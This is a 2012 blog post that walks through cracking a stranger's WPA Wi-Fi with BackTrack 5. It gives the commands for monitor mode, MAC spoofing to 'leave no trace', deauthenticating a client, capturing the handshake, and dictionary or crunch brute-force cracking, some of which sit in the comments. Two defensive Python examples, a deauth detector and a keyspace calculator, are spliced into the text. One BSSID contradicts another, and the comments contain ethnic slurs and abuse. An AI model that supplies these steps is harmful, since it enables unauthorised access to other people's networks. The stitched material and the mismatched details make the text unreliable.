Hacking Wireless Router WPA BackTrack 5

March 16, 2012

Posted by hasnain110 in Uncategorized.

Guys, here is a quick how-to for cracking any wireless network. I will keep things simple, stupid.

Requirements:

A PC with Linux BackTrack 5 RC2 installed

A working wireless LAN card installed (of course)

An up-to-date dictionary (wordlist) file of candidate passwords (Google it if you do not know what that is)

Go to an open area to find the victim network

Step 1:

Run this command to list the available WLAN adapters.

airmon-ng

It should give you output something like the one below.

[Screenshot 1]

Now we know that we have only one wireless interface, wlan0. Let's proceed to Step 2.

Step 2:

Now let's start airmon-ng on the interface we found in Step 1. Run the command given below.

airmon-ng start wlan0

[Screenshot 2]

Ignore the errors shown above; in my case they did not cause any trouble, but you might want to kill the conflicting processes if your results differ from mine. After this second step we have started monitor mode on wlan0, so there should now be an additional monitoring interface on the system. You can check whether a new interface mon0 has been added by running ifconfig, or try Step 3.

Step 3:

You should see another monitoring interface, mon0, on your system when you run ifconfig, or you can run the same airmon-ng command we used in Step 1.

[Screenshot 3]

Here we can see the new monitoring interface mon0.

Step 4:

A good hacker is always supposed to leave no trace of his break-in. If you run ifconfig and look closely, you will find that the monitoring interface mon0 and the wireless interface wlan0 share the same MAC address; in other words, mon0 inherits the MAC address of wlan0. Check the picture below.

[Screenshot 4]

Now we have to put a fake MAC address on the monitoring interface so that it leaves no trace. Let's bring the mon0 interface down by running the command

ifconfig mon0 down

Next lets change the MAC address of mon0 interface by running the below command

macchanger -m 00:11:22:33:44:55 mon0

[Screenshot 5]

The output shows the old MAC address and the new fake one. Now that we have changed the MAC address on mon0, let's bring the interface back up using the command below.

ifconfig mon0 up

Now, just to be sure, let's run the same command, ifconfig, that we already used above in Step 4.

ifconfig

[Screenshot 6]

Here we can see that we have successfully changed the MAC address of our monitoring interface mon0.

Step 5:

Let's start dumping the available wireless information. Run the command below.

airodump-ng mon0

[Screenshot 7]

Here my victim router's ESSID is AndroidHotSpot. The information I need from here is:

BSSID (MAC address): D0:C1:B1:5B:AC:33

Channel: 6

Step 6:

Now that we have identified our victim, it is time to narrow this network down further. We need to know how many workstations/terminals are connected to this wireless network. Run this command with the network information you obtained in Step 5:

airodump-ng -c 6 -w crackwpa --bssid 02:1A:11:FE:A4:CE

[Screenshot 8]

Here I can see that one client, whose MAC address is highlighted in green, is connected to this hotspot. To find the password you could patiently wait for another client to connect to this hotspot, but time is money, so let's force this client to reconnect and perform the authentication handshake with the access point again so that we can capture those packets.

Note: leave this session running and open another terminal for Step 7. Do not close the existing session.

Step 7:

Let's force the already connected client to perform the authentication handshake again.

Run the command given below in the new terminal session:

aireplay-ng -0 4 -a MAC-ADDR-OF-ROUTER -c MAC-ADDR-OF-CLIENT mon0

[Screenshot 9]
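What the aireplay-ng -0 step looks like from the defender's side, as an added example that is not part of the original post: the forged deauthentication frames it injects are visible to any wireless IDS listening on the channel. The Python below decodes the 802.11 management-frame header, picks out deauthentication/disassociation frames and raises an alert when one sender exceeds a rate no healthy access point reaches, or sends a broadcast deauth. The sample frames, the client address, the threshold and the window are constructed for this example; the AP BSSID reuses the one quoted in Step 5.

```python
"""Deauthentication-flood detection from raw 802.11 management frames.

Added example, not code from the original post.  The frames below are
constructed in this file so it runs offline; a real deployment would feed it
frames from a monitor-mode capture instead.
"""
import struct
from collections import defaultdict, deque

MGMT_TYPE = 0            # frame-control type field: 0 = management
DEAUTH_SUBTYPE = 0x0C    # management subtype 12 = deauthentication
DISASSOC_SUBTYPE = 0x0A  # management subtype 10 = disassociation
BEACON_SUBTYPE = 0x08
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def mac_bytes(text: str) -> bytes:
    return bytes(int(part, 16) for part in text.split(":"))


def parse_frame(frame: bytes):
    """Decode the fixed 24-byte 802.11 header; return None for non-management
    frames.  Layout: frame control(2) duration(2) addr1(6) addr2(6) addr3(6)
    sequence control(2), then the body (reason code for deauth/disassoc)."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    ftype = (fc0 >> 2) & 0x03
    subtype = (fc0 >> 4) & 0x0F
    if ftype != MGMT_TYPE:
        return None
    reason = None
    if subtype in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE) and len(frame) >= 26:
        reason = struct.unpack_from("<H", frame, 24)[0]
    return {"subtype": subtype, "dst": mac_str(frame[4:10]),
            "src": mac_str(frame[10:16]), "bssid": mac_str(frame[16:22]),
            "reason": reason}


def detect_deauth_flood(frames, threshold=5, window=2.0):
    """frames: iterable of (timestamp_seconds, raw_bytes), in time order.
    Emits one alert per source when `threshold` or more deauth/disassoc frames
    from it fall inside `window` seconds, and one when a source sends a
    broadcast deauth (which disconnects every client at once)."""
    recent = defaultdict(deque)
    flagged = set()
    alerts = []
    for ts, raw in frames:
        p = parse_frame(raw)
        if p is None or p["subtype"] not in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE):
            continue
        q = recent[p["src"]]
        q.append(ts)
        while q and ts - q[0] > window:   # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold and ("flood", p["src"]) not in flagged:
            flagged.add(("flood", p["src"]))
            alerts.append(f"deauth flood: {len(q)} frames from {p['src']} "
                          f"within {window}s (last reason code {p['reason']})")
        if p["dst"] == BROADCAST and ("broadcast", p["src"]) not in flagged:
            flagged.add(("broadcast", p["src"]))
            alerts.append(f"broadcast deauth from {p['src']} (reason code {p['reason']})")
    return alerts


def build_frame(subtype: int, dst: str, src: str, bssid: str, reason=None) -> bytes:
    """Constructed test frame: header only, plus a reason code when given."""
    fc = bytes([(subtype << 4) | (MGMT_TYPE << 2), 0x00])
    frame = fc + b"\x00\x00" + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid) + b"\x00\x00"
    if reason is not None:
        frame += struct.pack("<H", reason)
    return frame


# Constructed sample: the AP BSSID from Step 5 of the post, a made-up client,
# one beacon, then eight targeted deauths and a broadcast deauth within a second.
AP = "d0:c1:b1:5b:ac:33"
CLIENT = "aa:bb:cc:dd:ee:01"
SAMPLE_FRAMES = [(0.0, build_frame(BEACON_SUBTYPE, BROADCAST, AP, AP))]
SAMPLE_FRAMES += [(1.0 + i * 0.1, build_frame(DEAUTH_SUBTYPE, CLIENT, AP, AP, reason=7))
                  for i in range(8)]
SAMPLE_FRAMES.append((1.9, build_frame(DEAUTH_SUBTYPE, BROADCAST, AP, AP, reason=7)))

if __name__ == "__main__":
    for line in detect_deauth_flood(SAMPLE_FRAMES):
        print(line)
```

Run it as a script to print the two alerts the sample produces. The same logic applies unchanged to frames taken from a monitor-mode capture. The configuration-level mitigation for this step is 802.11w Protected Management Frames: when both the access point and the client enforce them, unprotected deauthentication frames are discarded and the forced reconnect does not happen.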

Final Step:

Now we finally have the whole dump saved in the working directory; we just need to crack the packet capture using the dictionary file. Run the command below.

aircrack-ng crackwpa-01.cap -w list

** crackwpa-01.cap is the filename of the packet capture

** list is the name of my dictionary file

[Screenshot 10]

Kabooom! You got the security key!

I personally think the key to success is the dictionary list that you have.

Hope you will enjoy my pretty simple steps to crack a secured wireless network.
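Why the closing remark about the dictionary holds, as an added example that is not part of the original post: WPA/WPA2-PSK derives the Pairwise Master Key with PBKDF2-HMAC-SHA1 over the passphrase and the SSID at 4096 iterations, so each candidate in a wordlist costs the attacker that much work, and the crunch-style masks discussed in the comments only finish when the keyspace they enumerate is small. The Python below computes the PMK (checked against the IEEE 802.11i test vector), counts the candidates in a length range or a crunch-style mask, and turns that count into a worst-case survival time at a given guess rate, which is the number a network owner needs when choosing a passphrase policy. The guess rate is an illustrative constructed input, not a measurement, and the function names are my own.

```python
"""WPA/WPA2-PSK cost per guess and keyspace sizing.

Added example, not code from the original post.  Every candidate passphrase
must be run through PBKDF2-HMAC-SHA1 (4096 rounds, 32-byte output) before it
can be checked against a captured handshake, so wordlist quality and keyspace
size decide whether a dictionary or brute-force run finishes at all.
"""
import hashlib

PBKDF2_ITERATIONS = 4096   # fixed by IEEE 802.11i for WPA-Personal
PMK_LEN = 32
WPA_MIN_PASSPHRASE = 8     # WPA-Personal passphrases are 8..63 characters
YEAR_SECONDS = 365 * 24 * 3600


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key as specified in IEEE 802.11i for a passphrase."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def keyspace(charset_size: int, min_len: int, max_len: int) -> int:
    """Candidates generated by a crunch-style run over lengths min_len..max_len."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def pattern_candidates(pattern: str, charset: str, wildcard: str = "@") -> int:
    """Candidates for a crunch -t style mask: each wildcard position is drawn
    from `charset`, every other position is a fixed, already-known character."""
    return len(charset) ** pattern.count(wildcard)


def seconds_to_exhaust(candidates: int, guesses_per_second: float) -> float:
    """Worst-case time to try every candidate at a given PBKDF2 rate."""
    return candidates / guesses_per_second


def human_duration(seconds: float) -> str:
    """Coarse, human-readable rendering of a duration in seconds."""
    units = [("years", YEAR_SECONDS), ("days", 86400), ("hours", 3600),
             ("minutes", 60)]
    for name, size in units:
        if seconds >= size:
            return f"{seconds / size:,.1f} {name}"
    return f"{seconds:.1f} seconds"


def minimum_length_for(charset_size: int, guesses_per_second: float,
                       horizon_seconds: float) -> int:
    """Smallest passphrase length (never below the WPA minimum of 8) whose full
    keyspace takes at least `horizon_seconds` to exhaust at the given rate."""
    n = WPA_MIN_PASSPHRASE
    while seconds_to_exhaust(charset_size ** n, guesses_per_second) < horizon_seconds:
        n += 1
    return n


if __name__ == "__main__":
    # IEEE 802.11i test vector: passphrase "password", SSID "IEEE".
    print("PMK:", wpa_pmk("password", "IEEE").hex())
    rate = 1_000.0  # illustrative guesses/s for one CPU; constructed, not measured
    # Mask from the comment thread: four known digits, four unknown from an 8-digit charset.
    masked = pattern_candidates("1223@@@@", "12345678")
    print(f"mask 1223@@@@ over 12345678: {masked} candidates, "
          f"{human_duration(seconds_to_exhaust(masked, rate))}")
    full = keyspace(95, 8, 16)
    print(f"8..16 chars over 95 printable: {full:.3e} candidates, "
          f"{human_duration(seconds_to_exhaust(full, rate))}")
    print("digits-only length that survives a year at that rate:",
          minimum_length_for(10, rate, YEAR_SECONDS))
```

The mask in the comment thread enumerates only 4096 candidates, which is why knowing the first four digits makes the run trivial, while the full 8-to-16-character printable keyspace is out of reach at any rate. The practical takeaway for an owner of such a hotspot is a long, random passphrase that appears in no wordlist, and WPA3-SAE where the hardware supports it, since SAE removes the offline dictionary attack on the captured handshake altogether.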


Comments»

1. Hafeez - March 17, 2012

I have cracked a lot of WEP WLANs using this method, but breaking WPA security with it is somewhat difficult without dictionaries.

hasnain110 - March 23, 2012

Try this command to make it a brute-force rather than a dictionary attack:

./crunch 8 8 12345678 -t 1223@@@@ | aircrack-ng -b 20:2B:C1:F5:3C:68 -w - /root/newlatino-01.cap

This is an example for a numeric-only password where I know the first 4 digits. You can use it for alphanumeric and special characters as well; please refer to the crunch man page for more details.

2. Maki - March 21, 2012

This is the right blog for anyone who wants to find out about this topic. You realize so much its almost hard to argue with you (not that I actually would want…HaHa). You definitely put a new spin on a topic thats been written about for years. Great stuff, just great!

http://www.smallbusinessplansoftware.net/

3. ebay123justdoit - July 6, 2012

Reblogged this on WIRELESS.

4. Sumit - July 24, 2012

I installed BackTrack 4 but when I try to run it, it says wireless adapter not found.

5. Hasnain - August 4, 2012

Make sure you have the necessary drivers installed for your WLAN card and that it is fully functional in the system. Simply run the command ifconfig wlan0 up; if it executes without any output, next type ifconfig wlan0. If this time it shows the details of your interface, your WLAN is functional.

bulaknu - December 11, 2013

I also got a problem. How can I get that driver?

6. dm ivy - September 5, 2012

I installed BackTrack 5 and its video isn't showing. How do I go about this?

hasnain110 - February 8, 2013

I think you are talking about the GUI of BT. You just need to type the command startx to invoke the GUI.

7. port scanner - February 8, 2013

Hi Hasnain, Majid here. Give me some tips about web server attacks; apart from Armitage, tell me some tool in BackTrack 5 that helps with web exploitation, OK?

hasnain110 - February 8, 2013

Hi Majid! It actually depends on what you need to exploit and how you need it done. I might be able to guide you a little if you can narrow your query down a bit.

8. Ahmed fawzy - February 21, 2013

Please... I need the specific requirements and tools for hacking WPA and how to set up all of them.

hasnain110 - February 28, 2013

Just install BackTrack and you will have all the tools built in.

9. Ahmed fawzy - March 6, 2013

Thank you Hasnain :) If you have a little video on how to set these up it would be great... Actually I got a wireless card and I got BackTrack 5, but I don't know how to set all of this up with each other.

10. hasnain110 - March 6, 2013

Well, it would be hard to make a video as I usually do not get much time, but as long as you have a working wireless card and BT5, all you need is to follow the steps mentioned above, nothing else. Should be pretty simple!

zuco - April 16, 2013

Will it all work with BT5 R3?

11. hasnain110 - April 16, 2013

Yes, it should work. I have not tried the latest one myself.

You might need to find the files located in different paths.

12. anonymous - May 16, 2013

fucking asshole u dont khnow what you are u doing.u bloody pakistani.go to hell u bitch.

hasnain110 - May 16, 2013

At first you anonymous INDIA Bastard. No one invited you to visit blog ! Secondly you came here to see what your retard brain cant do in ages! Last I guess I know lot more then what you know…Get Lost ..this blog I maintian for wanna be geeks not for PEE DRINKERS Like you!

13. hack for facebook - May 29, 2013

Hmm, it seems like your site ate my first comment (it was super long) so I guess I'll just sum up what I had written and say, I'm thoroughly enjoying your blog. I too am an aspiring blogger but I'm still new to the whole thing. Do you have any helpful hints for beginner blog writers? I'd certainly appreciate it.

14. hammad - June 19, 2013

How do I add my dictionary file in BackTrack? Please tell me in detail. I did all this, but I want to add my dictionary file in BackTrack. Or what if I have more than one wordlist; how do I add more wordlist files in BackTrack? Please reply.

16. hgw - August 11, 2013

Hi Ali,
Up to step 6 everything is OK. But if your victim router is this: BSSID MAC details: D0:C1: B1:5B:AC:33, why do you issue the command airodump-ng -c 6 -w crackwpa --bssid 02:1A:11:FE:A4:CE in step 6?

hasnain110 - September 6, 2013

Probably a typo / wrong screenshot pasted. It is just for understanding purposes.

chevy - September 6, 2013

Is this for WEP only, or for any strong signal that comes up on the screen?

hasnain110 - September 6, 2013

Never tried on all types, but it should work for any. Better Google it.

17. danish - August 27, 2013

Salam, great blog bro.
Sir, I want to know how I get dictionary files and how I put them in BackTrack 5 R.

hasnain110 - September 6, 2013

There are plenty of tools available to create dictionary files; you can Google for them. Just put that .txt file on your system and use it with whatever command you want to use to crack.

chevy - September 6, 2013

I run BackTrack from a DVD at boot-up. Is it better to install it on a hard drive? If yes, what is the safest way to install BT on a laptop which has Windows 7?

hasnain110 - September 6, 2013

Not really needed to install it; I prefer using a bootable USB, that's the quickest for me.

chevyeasy@aol.com - September 7, 2013

Is the USB the same as a DVD? How do I transfer the files to a flash drive and make the flash drive bootable?

hasnain110 - September 7, 2013

Google UNetbootin.

18. chevy Heurte - September 4, 2013

Hi, I'm new to this... please help... if I boot from DVD and one terminal is running as in step 6, how can I open a new terminal to run a different command for step 7? Is there a command in BT that I can use, or am I doing something wrong or missing something?

hasnain110 - September 6, 2013

Simply press Ctrl+Alt+T to open another tab in the same terminal window.

chevy - September 7, 2013

I pressed Ctrl+Alt+T and I was not able to open another terminal to complete step 7. What am I doing wrong?

hasnain110 - September 7, 2013

Sorry, my bad: Ctrl+Shift+T.

chevy - September 7, 2013

Ctrl+Shift+T does not work to open a new terminal for step 7. I boot from a DVD.

19. chevy - September 6, 2013

I stayed on for 3 days to get 20000 data packets and finally I got an error: dictionary not found.

hasnain110 - September 6, 2013

That's because of your dictionary file. Remember, patience and the dictionary file are the key.

20. danish - September 7, 2013

Sir, please suggest any good tool for adding a dictionary in BackTrack 5 R.

hasnain110 - September 7, 2013

Go to the official site of crunch.

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

danish - September 8, 2013

Thanks a lot sir.

21. frank - September 26, 2013

Hello, I'm running BackTrack 5 using VMware on Windows 7. After the first command, airmon-ng, no chipset is detected and I cannot proceed to the next step. I'm using an Atheros AR2985. Any solution? Thanks.

22. Alan - September 30, 2013

hi,

When I run this command "airodump-ng mon0", after 20 min of waiting there is still no available wireless information. Any reason?

23. sadasda - December 11, 2013

what the fuck are u asshole,,,u just give this form to allow us to reply or give feedback,,,but y dont u reply any one of us,,,u fucking asshole ,,shit,,puiii,,,

24. sadasda - December 11, 2013

fuck u asshole,,,fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck fuck youuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu……………………………………..

hasnain110 - December 23, 2013

I run this blog when I have time; it is a free-of-charge sharing service. I have the right to reply when I have time. I do not do spoon-feeding here. Get another blog for your queries. Abuse will not do any good!

25. see kiong - July 31, 2014

You will die first before the password comes up.

